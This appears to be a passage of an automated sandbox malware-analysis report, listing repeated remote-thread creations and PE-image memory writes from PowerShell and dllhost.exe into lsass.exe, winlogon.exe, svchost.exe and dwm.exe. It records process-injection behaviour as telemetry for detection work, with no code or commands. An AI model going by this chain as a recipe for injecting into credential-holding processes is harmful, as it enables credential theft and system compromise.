Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\lsass.exe EIP: 2DD22EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\winlogon.exe EIP: 7D1B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\lsass.exe EIP: 2DD22EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 4B922EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 4B8F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\dwm.exe EIP: F1D02EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 42AE2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 56A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 7AD42EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 4DA62EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 2542EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: EBF92EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: F1602EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\dwm.exe EIP: F1CD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 42AE2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 56A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 7AD42EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 4DA62EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 2542EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: EBF92EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: F1602EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 6A1A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 26992EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 5D5C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 6A172EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 26992EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 5D5C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: AB992EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: AB962EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 9B2D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 84182EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 9B2A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 84182EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 78762EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 5FCF2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 78732EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 5FCF2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 25DC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A5D82EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F41C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25342EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FCF42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F3532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26282EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 31E62EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 137C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3A3B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E4192EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1452EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 68FA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 951C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 63512EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4E0F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 98582EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3C5C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CF3D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8E332EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A2952EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 340C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 53792EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9A0E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 30B32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 35DA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 792F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E9172EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 59542EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1AC02EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1352EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D2532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8852EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 44DD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B00D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9A262EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B71A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 82022EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 706E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6A4A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 43F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15D12EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AD5E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 570C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E5262EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 90B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B06E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 82CD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9B7A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EF1C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2CA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DA142EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C025AC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 25D92EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A5D82EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F41C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25342EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FCF42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F3532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26282EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 31E62EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 137C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3A3B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E4192EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1452EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 68FA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 951C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 63512EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4E0F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 98582EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3C5C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CF3D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8E332EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A2952EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 340C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 53792EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9A0E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 30B32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 35DA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 792F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E9172EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 59542EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1AC02EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1352EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D2532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8852EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 44DD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B00D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9A262EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B71A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 82022EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 706E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6A4A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 43F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15D12EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AD5E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 570C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E5262EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 90B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B06E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 82CD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9B7A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EF1C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2CA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DA142EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 765F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 36BD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 616A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 19792EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BBF72EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3FF72EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DFFA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 765F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 36BD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 616A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 19792EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BBF72EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3FF72EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DFFA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A6F32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A7152EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\Conhost.exe EIP: E3462EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2232EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7DB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 21FA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6B9C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6B9F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 93342EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F9802EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\Conhost.exe EIP: E4762EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FBA02EBC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 17D2DD20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 17D2DD20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22F4B920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 262F1CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 262F1D00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23942AE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF056A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2287AD40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B94DA60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25202540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19FF1600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A76A170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23942AE0000 value starts with: 4D5A
